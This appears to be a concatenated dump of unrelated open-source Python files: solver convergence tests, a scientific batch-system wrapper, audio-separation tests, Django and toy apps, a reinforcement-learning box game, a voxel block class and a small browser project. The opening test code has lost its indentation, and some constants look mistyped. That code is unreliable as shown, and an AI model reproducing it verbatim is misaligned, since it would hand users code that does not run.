all_rates.append(rates)
filename_base = "img/code-validation/source_term-{:s}".format(label)
table = LatexConvergenceTable(all_errors, all_rates, resolutions-6, all_labels)
table.write(filename_base + ".tex")
plot = ConvergencePlot(trend_orders=[2, 4])
plot(all_errors, resolutions-6, all_labels)
plot.save(filename_base)
assert np.abs(np.max(all_rates[1]) - 4.0) < 0.1
def test_source_term_order():
source_term_order(IsothermalEquilibrium, "isothermal")
source_term_order(IsentropicEquilibrium, "isentropic")
def test_unbalanced_source_term():
gravity = PointMassGravity(1.0, 1.0, 1.0)
model = Euler(gamma = 1.4, gravity = gravity, specific_gas_constant = 1.0)
def rho(x):
return 2.0 + np.sin(3*np.pi*x) * np.cos(2*np.pi*x)
def dphi_dx(x):
return model.gravity.dphi_dx(x)
quadrature = GaussLegendre(5)
all_resolutions = 2**np.arange(4, 10) + 6
err = np.empty((1, all_resolutions.size))
for l, res in enumerate(all_resolutions):
grid = Grid([0.0, 1.0], res, 3)
def ic(x):
u0 = np.zeros((4,) + x.shape)
u0[0,...] = rho(x)
u0[3,...] = 1.0
return u0
u_bar = quadrature(grid.edges, ic)
source_term = UnbalancedSourceTerm(grid, model)
s_approx = source_term.volume_source(u_bar)
s_ref = quadrature(grid.edges[2:-2,...], lambda x : -rho(x)*dphi_dx(x))
err[:, l] = l1_error(s_approx[1,2:-2,...], s_ref)
rate = convergence_rate(err, all_resolutions-6)
assert np.all(np.abs(rate - 4.0) < 0.15)
def test_equilibrium_interpolation(pytest_config):
n_ghost = 3
model = Euler(gamma = 1.4, gravity = 1.0, specific_gas_constant = 1.0)
alpha = 0.25
resolutions = 2**np.arange(3, 10) + 6
err = np.empty(resolutions.size)
filename_base = "img/code-validation/equilibrium_interpolation-{:d}"
for l, n_cells in enumerate(resolutions):
grid = Grid([0.0, 1.0], n_cells, n_ghost)
equilibrium = IsothermalEquilibrium(grid, model)
ic = GaussianBumpIC(model, equilibrium)
ic.rho_amplitude, ic.p_amplitude = 1.0, 0.0
stencil = EquilibriumStencil(grid, equilibrium, model)
x0 = grid.edges[n_ghost:-n_ghost-1,0]
x1 = grid.edges[n_ghost+1:-n_ghost,0]
x_ref = grid.cell_centers[n_ghost:-n_ghost,0]
u0 = ic(grid)
interpolate = EquilibriumDensityInterpolation(grid, model, equilibrium, u0)
x = x0 + alpha*(x1 - x0)
w_exact = ic.point_values(x)
rho_exact = w_exact[0,...]
rho_ref, p_ref = equilibrium.point_values(u0[:,3:-3], x_ref)
rho_eq_approx, _ = equilibrium.extrapolate(rho_ref, p_ref, x_ref, x)
drho_approx = interpolate(alpha)
rho_approx = rho_eq_approx + drho_approx
plt.clf()
plt.plot(x_ref, u0[0,3:-3], label="ref")
plt.plot(x, rho_eq_approx, label="loc. eq")
plt.plot(x, rho_approx, label="approx")
plt.plot(x, drho_approx, label="delta")
plt.legend()
filename = filename_base.format(l)
plt.savefig(filename + ".eps")
plt.savefig(filename + ".png")
if testing_tools.is_manual_mode(pytest_config):
plt.show()
err[l] = l1_error(rho_approx[np.newaxis,:], rho_exact[np.newaxis,:])
rate = convergence_rate(err, resolutions-6)
assert np.all(np.abs(rate[3:] - 5.0) < 0.2)
``` |
{
"source": "1uc/SciBS",
"score": 2
} |
#### File: src/scibs/scibs.py
```python
class SciBS:
"""A Scientific Batch System.
Note: Batch systems should be used inside a `with` block to allow the batch
system to acquire and release resources properly.
"""
def __enter__(self):
return self
def __exit__(self, *args):
pass
def submit(self, job):
raise NotImplementedError(
f"{self.__class__.__name__} hasn't implemented `submit`."
)
```
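The base class above only defines the context-manager protocol and leaves `submit` abstract, so a back-end just overrides that one method. A minimal illustrative subclass (not part of the package):
```python
import scibs

class EchoBS(scibs.SciBS):
    """Toy back-end that only prints what it would submit."""
    def submit(self, job):
        print("would submit:", job.cmd)

with EchoBS() as bs:
    bs.submit(scibs.Job(cmd=["echo", "hello"], resources=scibs.JustCoresResource()))
```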
#### File: src/scibs/sequential_local_bs.py
```python
import scibs
class SequentialLocalBS(scibs.SciBS):
"""A batch system for when no batch system is present.
Instead of submitting jobs to a batch system, those jobs will simply
be run on the same computer.
NOTE: This is blocking, i.e. `submit` only returns after the
job has been completed.
NOTE: By default, this will, in the simplest case, run
subprocess.run(" ".join(job.cmd), shell=True, check=False)
The important thing to observe is the `shell=True` part.
"""
def __init__(self, submission_policy=None, wrap_policy=None):
if submission_policy is None:
submission_policy = scibs.SubprocessSubmissionPolicy(
subprocess_kwargs={"check": False, "shell": True}
)
if wrap_policy is None:
wrap_policy = scibs.DefaultWrapPolicy()
self._submission_policy = submission_policy
self._wrap_policy = wrap_policy
def submit(self, job):
cmd = self.cmdline(job)
self._submission_policy(cmd, cwd=job.cwd, env=job.env)
def cmdline(self, job):
return self.wrap(job)
def wrap(self, job):
return self._wrap_policy(job)
```
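A hedged usage sketch for `SequentialLocalBS`, following the `shell=True` behaviour described in its docstring; it assumes `Job` provides default `cwd` and `env` when they are not passed:
```python
import scibs

# Blocking local "submission": the command runs through the shell immediately.
job = scibs.Job(cmd=["echo", "hello from SciBS"], resources=scibs.JustCoresResource())
with scibs.SequentialLocalBS() as bs:
    bs.submit(job)  # roughly subprocess.run("echo hello from SciBS", shell=True)
```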
#### File: SciBS/test/test_local_bs.py
```python
import scibs
import pytest
def test_local_bs_with_gpus():
r = scibs.JustGPUsResource(n_gpus=1)
j = scibs.Job(
cmd=["echo ${CUDA_VISIBLE_DEVICES} >> __dbg_cuda_devices.txt"], resources=r
)
local_bs_kwargs = {
"resource_policy": scibs.GPUResourcePolicy(),
"local_resources": scibs.LocalGPUResources("1,2,3,4,5,6"),
}
with scibs.LocalBS(**local_bs_kwargs) as queue:
for k in range(10):
queue.submit(j)
```
#### File: SciBS/test/test_resources.py
```python
import datetime
import scibs
import pytest
def test_mpi_resource():
n_tasks = 10
mem_per_task = 50 * 10**6
wall_clock = datetime.timedelta(hours=3)
r = scibs.MPIResource(
n_mpi_tasks=n_tasks, wall_clock=wall_clock, mem_per_task=mem_per_task
)
assert r.n_cores == n_tasks
assert r.n_mpi_tasks == n_tasks
assert r.wall_clock == wall_clock
assert r.memory_per_core == mem_per_task
assert r.needs_mpi
assert not r.needs_omp
assert not hasattr(r, "n_omp_threads")
def test_omp_resource():
n_threads = 8
total_memory = 50 * 10**6
wall_clock = datetime.timedelta(hours=3)
r = scibs.OMPResource(
n_omp_threads=n_threads, wall_clock=wall_clock, total_memory=total_memory
)
assert r.n_cores == n_threads
assert r.n_omp_threads == n_threads
assert r.wall_clock == wall_clock
assert r.memory_per_core == total_memory / n_threads
assert not r.needs_mpi
assert r.needs_omp
assert not hasattr(r, "n_mpi_tasks")
def test_mpi_omp_resource():
n_threads = 4
n_tasks = 1
n_cus = 3
mem_per_cu = 50 * 10**6
cu = scibs.CU(n_omp_threads=n_threads, n_mpi_tasks=n_tasks)
r = scibs.CUResource(cu, n_cus, mem_per_cu=mem_per_cu)
assert r.n_cores == n_threads * n_cus
assert r.memory_per_core == mem_per_cu / n_threads
assert r.needs_mpi
assert r.needs_omp
class IncompleteResource(scibs.Resource):
pass
def test_resource_interface():
incomplete_resource = IncompleteResource()
with pytest.raises(NotImplementedError):
incomplete_resource.n_cores
with pytest.raises(NotImplementedError):
incomplete_resource.memory_per_core
def test_cu_omp():
cu = scibs.CU(n_omp_threads=2)
assert cu.n_cores_per_cu == 2
cu = scibs.CU(n_mpi_tasks=3)
assert cu.n_cores_per_cu == 3
def test_just_cores_resource():
just_cores = scibs.JustCoresResource()
assert just_cores.n_cores == 1
just_cores = scibs.JustCoresResource()
assert just_cores.memory_per_core is None
just_cores = scibs.JustCoresResource(n_cores=2, total_memory=4)
assert just_cores.memory_per_core == 2.0
def test_just_gpus_resources():
r = scibs.JustGPUsResource(3)
assert r.n_cores == 1
assert r.n_gpus_per_process == 3
assert r.memory_per_core is None
r = scibs.JustGPUsResource(n_gpus=4, total_memory=4)
assert r.n_cores == 1
assert r.n_gpus_per_process == 4
assert r.memory_per_core == 4.0
``` |
{
"source": "1uka/open-unmix-pytorch",
"score": 2
} |
#### File: open-unmix-pytorch/tests/test_datasets.py
```python
import pytest
import numpy as np
import data
def test_musdb():
musdb = data.MUSDBDataset(
download=True,
samples_per_track=1,
seq_duration=1.0
)
for x, y in musdb:
print(x.mean())
```
#### File: open-unmix-pytorch/tests/test_inference.py
```python
import pytest
import numpy as np
import torch
import model
import test
@pytest.fixture(params=[4096, 4096*10])
def nb_timesteps(request):
return int(request.param)
@pytest.fixture(params=[1, 2, 3])
def nb_channels(request):
return request.param
@pytest.fixture(params=[1, 2, 16])
def nb_samples(request):
return request.param
@pytest.fixture(params=[1024, 2048, 4096])
def nfft(request):
return int(request.param)
@pytest.fixture(params=[2, 4, 8])
def hop(request, nfft):
return(nfft // request.param)
@pytest.fixture
def audio(request, nb_samples, nb_channels, nb_timesteps):
return torch.rand((nb_samples, nb_channels, nb_timesteps))
def test_stft(audio, nb_channels, nfft, hop):
unmix = model.OpenUnmix(nb_channels=nb_channels)
unmix.stft.center = True
X = unmix.stft(audio)
X = X.detach().numpy()
X_complex_np = X[..., 0] + X[..., 1]*1j
out = test.istft(X_complex_np)
assert np.sqrt(np.mean((audio.detach().numpy() - out)**2)) < 1e-6
```
#### File: open-unmix-pytorch/tests/test_regression.py
```python
import os
import pytest
import musdb
import simplejson as json
import museval
import numpy as np
import eval
test_track = 'Al James - Schoolboy Facination'
json_path = os.path.join(
os.path.dirname(os.path.realpath(__file__)),
'data/%s.json' % test_track,
)
@pytest.fixture()
def mus():
return musdb.DB(download=True)
def test_estimate_and_evaluate(mus):
# return any number of targets
with open(json_path) as json_file:
ref = json.loads(json_file.read())
track = [track for track in mus.tracks if track.name == test_track][0]
scores = eval.separate_and_evaluate(
track,
targets=['vocals', 'drums', 'bass', 'other'],
model_name='umx',
niter=1,
alpha=1,
softmask=False,
output_dir=None,
eval_dir=None,
device='cpu'
)
assert scores.validate() is None
with open(
os.path.join('.', track.name) + '.json', 'w+'
) as f:
f.write(scores.json)
scores = json.loads(scores.json)
for target in ref['targets']:
for metric in ['SDR', 'SIR', 'SAR', 'ISR']:
ref = np.array([d['metrics'][metric] for d in target['frames']])
idx = [t['name'] for t in scores['targets']].index(target['name'])
est = np.array(
[
d['metrics'][metric]
for d in scores['targets'][idx]['frames']
]
)
assert np.allclose(ref, est, atol=1e-02)
``` |
{
"source": "1UnboundedSentience/Django",
"score": 2
} |
#### File: Django/myintro/views.py
```python
from django.http import HttpResponse
from django import template
from django.shortcuts import render
def donkey(request):
return HttpResponse("Hello World! This will soon be a webpage")
def penguin(request):
return render(request, 'example-template.html',
{
'person_name' : "Jason",
'item_list': ['snake', 'dog', 'cat'],
'ordered_warranty': False,
'company': "Google Inc.",
'ship_date': "April 10, 2016"
})
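# A hedged sketch of how these views might be wired up in a urls.py
# (the project's URLconf is not shown here; route names are illustrative):
#
#   from django.urls import path
#   from myintro import views
#
#   urlpatterns = [
#       path('donkey/', views.donkey, name='donkey'),
#       path('penguin/', views.penguin, name='penguin'),
#   ]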
``` |
{
"source": "1UnboundedSentience/MovieTrailerApp",
"score": 4
} |
#### File: 1UnboundedSentience/MovieTrailerApp/media.py
```python
class Movie():
def __init__(self, title, poster_image_url, trailer_youtube_url):
self.title = title
self.poster_image_url = poster_image_url
self.trailer_youtube_url = trailer_youtube_url
'''Create a data structure (i.e. a Python Class) to store your favorite movies, including movie title, box art URL (or poster URL) and a YouTube link to the movie trailer.
Create multiple instances of that Python Class to represent your favorite movies; group all the instances together in a list.
To help you generate a website that displays these movies, we have provided a starter code repository that contains a Python module called fresh_tomatoes.py. To get started, fork this repository to create your own copy in GitHub. Then clone your ud036_StarterCode repository to work on this project locally on your computer. The fresh_tomatoes.py module has a function called open_movies_page that takes in one argument, which is a list of movies, and creates an HTML file which will display all of your favorite movies.
Ensure your website renders correctly when you attempt to load it in a browser.'''
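# A hedged usage sketch based on the description above (normally kept in a
# separate driver script; the poster and trailer URLs here are placeholders):
#
#   import fresh_tomatoes
#   import media
#
#   toy_story = media.Movie("Toy Story",
#                           "https://example.com/toy_story_poster.jpg",
#                           "https://www.youtube.com/watch?v=example")
#   fresh_tomatoes.open_movies_page([toy_story])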
``` |
{
"source": "1upCommunity/Box",
"score": 2
} |
#### File: 1upCommunity/Box/person.py
```python
import time
import gym, numpy as np
import pygame, pymunk, logging, math, random
# imports for DQNAgent
import numpy as np
from keras.models import Sequential
from keras.layers import Dense, Dropout, Conv2D, MaxPooling2D, Activation, Flatten
from tensorflow.keras.optimizers import Adam
from keras.callbacks import TensorBoard
import tensorflow as tf
from collections import deque
import time
import random
import os
# Hide GPU from visible devices
tf.config.set_visible_devices([], 'GPU')
DISCOUNT = 0.99
REPLAY_MEMORY_SIZE = 50_000 # How many last steps to keep for model training
MIN_REPLAY_MEMORY_SIZE = 1_000 # Minimum number of steps in a memory to start training
MINIBATCH_SIZE = 64 # How many steps (samples) to use for training
UPDATE_TARGET_EVERY = 5 # Terminal states (end of episodes)
MODEL_NAME = 'BOX'
# Exploration settings
ELIPSON_DECAY = 0.099975
MIN_EPSILON = 0.001
# For stats
ep_rewards = [-200]
# For more repetitive results
random.seed(1)
np.random.seed(1)
# Memory fraction, used mostly when training multiple agents
#gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=MEMORY_FRACTION)
#backend.set_session(tf.Session(config=tf.ConfigProto(gpu_options=gpu_options)))
# Create models folder
if not os.path.isdir('models'):
os.makedirs('models')
# Own Tensorboard class
class ModifiedTensorBoard(TensorBoard):
# Overriding init to set initial step and writer (we want one log file for all .fit() calls)
def __init__(self, **kwargs):
super().__init__(**kwargs)
self.step = 1
self.writer = tf.summary.create_file_writer(self.log_dir)
# Overriding this method to stop creating default log writer
def set_model(self, model):
pass
# Overrided, saves logs with our step number
# (otherwise every .fit() will start writing from 0th step)
def on_epoch_end(self, epoch, logs=None):
self.update_stats(**logs)
# Overrided
# We train for one batch only, no need to save anything at epoch end
def on_batch_end(self, batch, logs=None):
pass
# Overrided, so won't close writer
def on_train_end(self, _):
pass
# Custom method for saving own metrics
# Creates writer, writes custom metrics and closes writer
def update_stats(self, **stats):
self._write_logs(stats, self.step)
# Agent class
class DQNAgent:
def __init__(self, env):
self.env = env
# Main model
self.model = self.create_model()
# Target network
self.target_model = self.create_model()
self.target_model.set_weights(self.model.get_weights())
# An array with last n steps for training
self.replay_memory = deque(maxlen=REPLAY_MEMORY_SIZE)
# Custom tensorboard object
self.tensorboard = ModifiedTensorBoard(log_dir="logs/{}-{}".format(MODEL_NAME, int(time.time())))
# Used to count when to update target network with main network's weights
self.target_update_counter = 0
def create_model(self,):
model = Sequential()
observation_space = 60000, np.array(self.env.observation).shape[0], np.array(self.env.observation).shape[1], 1
action_space = self.env.action_space.n
model.add(Conv2D(32, (3, 3), activation='relu', input_shape=observation_space[1:]))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Conv2D(256, (3, 3)))
model.add(Activation('relu'))
model.add(MaxPooling2D(pool_size=(2, 2)))
model.add(Dropout(0.2))
model.add(Flatten()) # this converts our 3D feature maps to 1D feature vectors
model.add(Dense(64))
model.add(Dense(action_space, activation='linear')) # ACTION_SPACE_SIZE = how many choices (9)
model.compile(loss="mse", optimizer=Adam(lr=0.001), metrics=['accuracy'])
return model
# Adds step's data to a memory replay array
# (observation space, action, reward, new observation space, done)
def update_replay_memory(self, transition):
self.replay_memory.append(transition)
# Trains main network every step during episode
def train(self, terminal_state, step):
# Start training only if certain number of samples is already saved
if len(self.replay_memory) < MIN_REPLAY_MEMORY_SIZE:
return
# Get a minibatch of random samples from memory replay table
minibatch = random.sample(self.replay_memory, MINIBATCH_SIZE)
# Get current states from minibatch, then query NN model for Q values
current_states = np.array([transition[0] for transition in minibatch])/255
current_qs_list = self.model.predict(current_states)
# Get future states from minibatch, then query NN model for Q values
# When using target network, query it, otherwise main network should be queried
new_current_states = np.array([transition[3] for transition in minibatch])/255
future_qs_list = self.target_model.predict(new_current_states)
X = []
y = []
# Now we need to enumerate our batches
for index, (current_state, action, reward, new_current_state, done) in enumerate(minibatch):
# If not a terminal state, get new q from future states, otherwise set it to 0
# almost like with Q Learning, but we use just part of equation here
if not done:
max_future_q = np.max(future_qs_list[index])
new_q = reward + DISCOUNT * max_future_q
else:
new_q = reward
# Update Q value for given state
current_qs = current_qs_list[index]
current_qs[action] = new_q
# And append to our training data
X.append(current_state)
y.append(current_qs)
# Fit on all samples as one batch, log only on terminal state
self.model.fit(np.array(X)/255, np.array(y), batch_size=MINIBATCH_SIZE, verbose=0, shuffle=False, callbacks=[self.tensorboard] if terminal_state else None)
# Update target network counter every episode
if terminal_state:
self.target_update_counter += 1
# If counter reaches set value, update target network with weights of main network
if self.target_update_counter > UPDATE_TARGET_EVERY:
self.target_model.set_weights(self.model.get_weights())
self.target_update_counter = 0
# Queries main network for Q values given current observation space (environment state)
def get_qs(self, state):
return self.model.predict(np.array(state).reshape(-1, *state.shape)/255)[0]
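    # Hedged sketch of how get_qs is typically consumed in an epsilon-greedy
    # training loop (the loop itself is outside the code shown here):
    #
    #   if np.random.random() > epsilon:
    #       action = np.argmax(agent.get_qs(current_state))
    #   else:
    #       action = np.random.randint(0, env.action_space.n)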
class WorldEnvironment(gym.Env):
def __init__(self, terrain_world, parent):
self.action_space = gym.spaces.Discrete(15)
self.observation_space = gym.spaces.Box(low=0, high=255, shape=(84, 84, 1), dtype=np.uint8)
self.velocity = (0, 0)
self.position = (0, 0)
self.terrain_world = terrain_world
self.parent = parent
self.inventory = []
self.scheduled_rewards = []
self.time_lapsed = 0
self.health = 100
self.observation = self.get_observation()
self.last_state = self.observation
self.agent = DQNAgent(self)
def play_sound(self):
        # play the "coin.wav" sound loaded via the parent's texture store
sound = self.parent.parent.parent.textures.get("coin.wav")
pygame.mixer.Sound.play(sound)
def get_observation(self):
_ = int(self.position[0] / 32), int(self.position[1] / 32)
observation = self.parent.parent.get_terrain_matrix(_, fov=25)
return observation
def step(self, action):
self.position = self.parent.body.position
self.time_lapsed += 1
reward = 0
# generate action id from tensor
if not isinstance(action, int):
action = action.argmax()
if action > 8 and action < 13 and random.randint(0, 3) == 0:
self.play_sound()
if action == 0:
self.velocity = (self.velocity[0] + 40, self.velocity[1])
elif action == 1:
self.velocity = (self.velocity[0] - 40, self.velocity[1])
elif action == 2:
self.velocity = (self.velocity[0], self.velocity[1] - 400)
elif action == 3:
self.velocity = (self.velocity[0] + 40, self.velocity[1] - 400)
elif action == 4:
self.velocity = (self.velocity[0] - 40, self.velocity[1] - 400)
elif action == 5:
# break block above
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block(pos)
if block is not None:
self.inventory.append(block)
elif action == 6:
# break block below
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block((pos[0], pos[1] + 1))
if block is not None:
self.inventory.append(block)
elif action == 7:
# break block left
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block((pos[0]-1, pos[1]))
if block is not None:
self.inventory.append(block)
elif action == 8:
# break block right
pos = int(self.position[0] / 32), int(self.position[1] / 32)
block = self.parent.parent.remove_block((pos[0]+1, pos[1]))
if block is not None:
self.inventory.append(block)
elif action == 9:
# place block above
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block(pos, block)
except Exception as e:
pass
elif action == 10:
# place block below
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block((pos[0], pos[1] + 1), block)
except Exception as e:
pass
elif action == 11:
# place block left
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block((pos[0]-1, pos[1]), block)
except Exception as e:
pass
elif action == 12:
# place block right
try:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
if len(self.inventory) > 0:
block = self.inventory.pop()
self.parent.parent.place_block((pos[0]+1, pos[1]), block)
except Exception as e:
pass
# 13, 14: attack left, right
elif action == 13:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
_ = self.parent.parent.attack((pos[0]-1, pos[1]))
            if _ is None:
reward -= 10
else:
print(f'{_} was attacked by {self.parent.name}')
elif action == 14:
pos = int(self.position[0] / 32), int(self.position[1] / 32)
_ = self.parent.parent.attack((pos[0]+1, pos[1]))
            if _ is None:
reward -= 10
else:
print(f'{_} was attacked by {self.parent.name}')
if self.position[1] > 10000:
reward += -100
self.reset()
print(f"[{self.parent.name}] fell off the world")
# reward on inventory size
reward += len(self.inventory) / 10
if len(self.scheduled_rewards) > 0:
reward += self.scheduled_rewards.pop(0)
reward += 100 * 1 / self.time_lapsed
# get distance to (0, 0)
distance = math.dist((0, 0), self.position)
if distance > 1000:
reward += 1 * distance / 1000
else:
reward += -1 * distance / 1000
# If a block exists at the player's position, the player is suffocated
_ = (self.position[0] / 32, self.position[1] / 32)
if self.parent.parent.get_terrain_at(_) != 0:
reward += -100
self.health -= 1
# sort the inventory
self.inventory = sorted(self.inventory, key=lambda x: x)
observation = self.get_observation()
# Health is 0 if the player is dead
if self.health <= 0:
reward += -100
self.reset()
print(f"[{self.parent.name}] died")
# give reward for maintaining health
reward += (self.health - 50) * 0.1
# train DQNAgent
self.agent.update_replay_memory((self.last_state, action, reward, observation, True))
self.last_state = observation
return observation, reward, False, {}
def reset(self):
self.parent.reset()
class Boxlander:
def __init__(self, name, parent):
self.parent = parent
self.name = name
self.FOV = 10
self.env = WorldEnvironment(self.parent, self)
self.frame = 0
self.body = pymunk.Body(1, 1)
self.body.position = (0, 0)
self.body.velocity = (0, 0)
self.body.angle = 0
self.shape = pymunk.Circle(self.body, 10)
self.shape.collision_type = 1
self.shape.color = (255, 255, 255)
self.shape.elasticity = 0.95
self.previous_velocity = (0, 0)
self.parent.space.add(self.body, self.shape)
self.epsilon = 0.1
def reset(self):
self.body.position = (0, 0)
self.body.velocity = (0, 0)
self.body.angle = 0
self.frame = 0
self.env.health = 100
def render(self, window):
for i in range(len(self.parent.collisions)-1):
try:
if self.shape in self.parent.collisions[i].shapes:
_ = self.previous_velocity[1] / 5000 * 3
if _ > 0.01:
self.env.health -= _
self.env.scheduled_rewards.append(-_)
self.parent.collisions.remove(self.parent.collisions[i])
except Exception as e:
pass
if self.frame % 20 == 0:
if random.randint(0, 100) < self.epsilon * 100 and self.epsilon > MIN_EPSILON:
self.env.step(self.env.action_space.sample())
self.epsilon *= ELIPSON_DECAY
else:
_ = self.env.agent.get_qs(self.env.get_observation())
self.env.step(_)
# apply force
# clamp velocity
self.body.velocity = self.body.velocity[0] + self.env.velocity[0], self.body.velocity[1] + self.env.velocity[1]
self.env.velocity = (0, 0)
self.env.position = self.body.position
self.frame += 1
# if the current body velocity is not 0, set the previous velocity to the current body velocity
if self.body.velocity[0] != 0 and self.body.velocity[1] != 0:
self.previous_velocity = self.body.velocity
# player color based on health
if self.env.health > 50:
c = (255, 255, 255)
elif self.env.health > 25:
c = (255, 255, 0)
else:
c = (255, abs(int(math.sin(self.frame / 10) * 255)), abs(int(math.sin(self.frame / 10) * 255)))
pygame.draw.circle(window, c, (int(self.body.position[0] - self.parent.parent.x), int(self.body.position[1]) - self.parent.parent.y), 10)
# nametag
font = pygame.font.SysFont("comicsansms", 20)
text = font.render(self.name, True, (255, 255, 255))
window.blit(text, (int(self.body.position[0] - self.parent.parent.x) - text.get_width() // 2, int(self.body.position[1]) - self.parent.parent.y + 32 - text.get_height() // 2))
# draw health bar
pygame.draw.rect(window, (255, 255, 255), (int(self.body.position[0] - self.parent.parent.x) - 10, int(self.body.position[1]) - self.parent.parent.y - 32, 20, 10))
color = (0, 255, 0) if self.env.health > 75 else (255, 255, 0) if self.env.health > 50 else (255, 0, 0)
pygame.draw.rect(window, color, (int(self.body.position[0] - self.parent.parent.x) - 10, int(self.body.position[1]) - self.parent.parent.y - 32, 20 * self.env.health / 100, 10))
``` |
{
"source": "1upCommunity/PyCraft",
"score": 3
} |
#### File: PyCraft/terrain/block.py
```python
from OpenGL.GL import *
import threading
import random
import time
class Block:
"""
Block
* Base block class
"""
def __init__(self, name, renderer):
"""
Block.__init__
:name: name of the block
:texture: texture of the block
:parent: the parent window
"""
self.name = name
self.renderer = renderer
self.tex_coords = {}
self.preloads = []
self.preloads_per_frame = 1
self.preloaded = 0
self.added_data = []
def preload(self, position, chunk, storage):
"""
preload
* Preloads the textures of the block
"""
self.add(position, chunk, storage)
def add(self, position, chunk, storage):
"""
add
* Adds a block to the world
:position: the position of the block
"""
x, y, z = position
X, Y, Z = (x + 1, y + 1, z + 1)
if not chunk.world.block_exists((x, Y, z)):
storage.add((x, Y, Z, X, Y, Z, X, Y, z, x, Y, z), self.tex_coords["top"])
if not chunk.world.block_exists((x, y - 1, z)):
storage.add((x, y, z, X, y, z, X, y, Z, x, y, Z), self.tex_coords["bottom"])
if not chunk.world.block_exists((x - 1, y, z)):
storage.add((x, y, z, x, y, Z, x, Y, Z, x, Y, z), self.tex_coords["left"])
if not chunk.world.block_exists((X, y, z)):
storage.add((X, y, Z, X, y, z, X, Y, z, X, Y, Z), self.tex_coords["right"])
if not chunk.world.block_exists((x, y, Z)):
storage.add((x, y, Z, X, y, Z, X, Y, Z, x, Y, Z), self.tex_coords["front"])
if not chunk.world.block_exists((x, y, z - 1)):
storage.add((X, y, z, x, y, z, x, Y, z, X, Y, z), self.tex_coords["back"])
def all_blocks(renderer):
"""
all_blocks
* Returns a list of all blocks
"""
# List all files in the blocks folder
# Then import each file as a module
# Then get the block class from the module
# Then add the block class to the dictionary
import os
import sys
import importlib
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
blocks = {}
for file in os.listdir("./terrain/blocks"):
if file.endswith(".py") and file != "__init__.py":
module = importlib.import_module("blocks." + file[:-3])
_block = module.block(renderer)
blocks[_block.name] = _block
return blocks
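# --- Hedged illustration (added for clarity; not part of the original file) ---
# all_blocks() expects each module in ./terrain/blocks/ to expose a `block`
# class. The minimal example below shows the shape such a class takes: a name
# plus per-face texture coordinates that Block.add() reads when emitting
# visible faces. The coordinates here are placeholders, not real atlas values.
class _ExampleStoneBlock(Block):
    def __init__(self, renderer):
        super().__init__("example_stone", renderer)
        placeholder_coords = (0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0)
        self.tex_coords = {
            face: placeholder_coords
            for face in ("top", "bottom", "left", "right", "front", "back")
        }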
``` |
{
"source": "1upCommunity/Vortex",
"score": 3
} |
#### File: Vortex/core/jsparse.py
```python
import pyjsparser
class VortexJSParser:
"""
VortexJSParser
A class to parse javascript code.
"""
def __init__(self):
"""
__init__
Initialize the parser.
return: self
"""
@staticmethod
def parse(js_code):
"""
parse
Parse the javascript code.
js_code: The javascript code.
return: dict
"""
return pyjsparser.parse(js_code) # parse the javascript code
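if __name__ == "__main__":
    # Hedged demo (added for illustration; not part of the original file).
    # pyjsparser returns an ESTree-style dict, so the root node of any
    # parsed script reports itself as a 'Program'.
    tree = VortexJSParser.parse("var answer = 6 * 7;")
    print(tree["type"])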
```
#### File: Vortex/Vortex/dependency_installer.py
```python
import os
import tqdm
import sys
import importlib
deps = importlib.import_module("dependency_list").deps # get dependency list
path = sys.executable # get path to python
def install_deps():
"""
install_deps
Install all dependencies.
return: None
"""
for dep in tqdm.tqdm(deps): # loop through all dependencies
os.system(f"{path} -m pip install {dep}") # install the dependency
if __name__ == '__main__':
install_deps() # install dependencies
```
#### File: Vortex/rendering/renderer.py
```python
from rendering import VortexInfo
# external imports
import pyglet
from pyglet.window import Window
class VortexWindow(Window):
"""
VortexWindow
This class is the main window of the application.
"""
def __init__(self):
"""
__init__
initialize the window
return: self
"""
super().__init__(resizable=True) # initialize the base class
self.batch = pyglet.graphics.Batch() # create a batch
self.frame = 0 # frame counter
self.resizable = True # allow resizing
self.tab_bar_height = 20 # tab bar height
self.set_caption("Vortex") # set window title
self.set_icon(pyglet.image.load( # logo image
"assets/VortexLogoTransparent.png"))
self.info_label = VortexInfo(self) # create the info label
pyglet.clock.schedule_interval(self.on_update, 1/60) # schedule update
pyglet.clock.schedule_once(self.refresh_size, 0) # schedule draw
def refresh_size(self, *args):
"""
refresh_size
        A workaround for the weird white line that appears
        at startup and goes away after the first resize.
*args: Receives the pyglet dt argument.
return: None
"""
self.set_size(self.width, self.height) # set the size of the window
def on_draw(self):
"""
on_draw
Draw the window.
return: None
"""
self.clear() # clear the window
self.batch.draw() # draw the batch
def on_update(self, dt):
"""
on_update
Update the window.
dt: The time since the last update.
return: None
"""
self.frame += 1 # increment the frame counter
self.info_label.update() # update the info label
``` |
{
"source": "1upkd/awesome_rasam",
"score": 3
} |
#### File: src/awesome_rasam/__init__.py
```python
__version__ = "0.0.6"
import time
import traceback
from bs4 import BeautifulSoup
from bs4.element import Tag
import requests
default_features = "html5lib"
class AwesomeRasam:
def __init__(self, initializer, *args, **kwargs):
if isinstance(initializer, str):
if (initializer.startswith("http://")
or initializer.startswith("https://")):
if 'delay' in kwargs:
if callable(kwargs['delay']):
time.sleep(kwargs['delay']())
else:
time.sleep(kwargs['delay'])
del kwargs['delay']
r = requests.get(initializer, **kwargs)
self._soup = BeautifulSoup(r.text, features=default_features)
else:
self._soup = BeautifulSoup(initializer, *args, **kwargs)
elif (isinstance(initializer, BeautifulSoup)
or isinstance(initializer, Tag)):
self._soup = initializer
else:
error_text = "Intializer must be url string, html/xml string, BeautifulSoup or bs4.Element.Tag, but got {} object"
error_text = error_text.format(type(initializer))
raise UnsupportedInitializer(error_text)
@staticmethod
def _get_attribute(el, selector, attribute, pipe=[], attribute_flag=True, fallback=None):
